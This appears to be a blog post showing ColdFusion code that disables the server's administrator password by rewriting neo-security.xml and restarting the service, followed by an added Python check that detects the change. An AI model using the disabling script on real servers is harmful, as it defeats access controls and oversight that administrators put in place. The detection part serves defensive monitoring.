TerrenceRyan.com

I'm a 35 year old redhead geek from Philly.
I'm currently a Developer Evangelist for Adobe.
Also the author of Driving Technical Change

Hacking ColdFusion - Disable Administrator Security


During MAX 2006 I attended the ColdFusion CFC Birds of a Feather. Someone was complaining about the fact that their administrators were too restrictive despite not understanding the ColdFusion service. They were unable to see CFC introspection because of an administrator password. So I suggested they disable security programmatically.

After thinking about it for a while, I decided that it was an interesting challenge. I looked at it a couple of different ways, and finally settled on this solution:

		
<!--- Grab the security file contents --->
<cffile action="read" file="#server.ColdFusion.rootdir#\lib\neo-security.xml" variable="rawfilecontents" />

<!--- Convert it to a structure --->
<cfwddx action="wddx2cfml" input="#rawfilecontents#" output="loginfo" />

<!--- Change the setting --->
<cfset loginfo["admin.security.enabled"] = JavaCast("boolean", false) />

<!--- Convert back to WDDX --->
<cfwddx action="cfml2wddx" input="#loginfo#" output="fileToWrite" />

<!--- Write it back to the disk. --->
<cffile action="write" addnewline="yes" file="#server.ColdFusion.rootdir#\lib\neo-security.xml" output="#fileToWrite#" fixnewline="no" />

<!--- This seems to restart the server eventually. I had to rerun it several times to get it to work. --->
<cfset serverFactory = CreateObject("java", "coldfusion.server.ServiceFactory") />
<cfset runTimeService = serverFactory.RuntimeService />
<cfset runTimeService.ReStart() />

You have to run it a couple times before it kicks in.

Now, it is important to point out the following:

  1. If proper sandboxing is enabled, this won't work.
  2. If proper IIS restrictions on CFIDE\administrator are set, this won't work.
  3. You should never do this on a hosted server as it will probably violate your hosting agreement.
  4. I'm not advocating messing with your administrators.
  5. But you totally could.
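
For administrators who want to notice this change, here is a configuration check written as an added example (it is not part of the original post): it parses a WDDX packet like the one in `lib\neo-security.xml` and reports the state of `admin.security.enabled`. The sample packets are constructed, the function names are hypothetical, and the assumed layout is a top-level WDDX struct with `<var>` entries.

```python
import xml.etree.ElementTree as ET

KEY = "admin.security.enabled"  # the setting the post's script flips

# Constructed sample packets (not taken from a real server), WDDX struct form.
SAMPLE_ENABLED = (
    "<wddxPacket version='1.0'><header/><data><struct>"
    "<var name='admin.security.enabled'><boolean value='true'/></var>"
    "<var name='rds.enabled'><string>false</string></var>"
    "</struct></data></wddxPacket>"
)
SAMPLE_DISABLED = SAMPLE_ENABLED.replace("value='true'", "value='false'")
SAMPLE_MISSING = "<wddxPacket version='1.0'><header/><data><struct/></data></wddxPacket>"


def wddx_top_level(xml_text):
    """Return {name: value} for scalar vars of the packet's top-level struct."""
    struct = ET.fromstring(xml_text).find("./data/struct")
    if struct is None:
        raise ValueError("not a WDDX struct packet")
    out = {}
    for var in struct.findall("var"):
        child = next(iter(var), None)
        if child is None:
            continue
        if child.tag == "boolean":
            out[var.get("name")] = child.get("value", "").lower() == "true"
        elif child.tag in ("string", "number"):
            out[var.get("name")] = child.text or ""
    return out


def admin_security_state(xml_text):
    """Return 'enabled', 'disabled' or 'missing' for admin.security.enabled."""
    settings = wddx_top_level(xml_text)
    if KEY not in settings:
        return "missing"
    value = settings[KEY]
    if isinstance(value, str):  # tolerate a value serialized as a string
        value = value.strip().lower() in ("true", "yes", "1")
    return "enabled" if value else "disabled"


if __name__ == "__main__":
    for pkt in (SAMPLE_ENABLED, SAMPLE_DISABLED, SAMPLE_MISSING):
        print(admin_security_state(pkt))
```

Run on a schedule against the live file, any result other than `enabled` is worth an alert, alongside a file-integrity watch on the same path.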
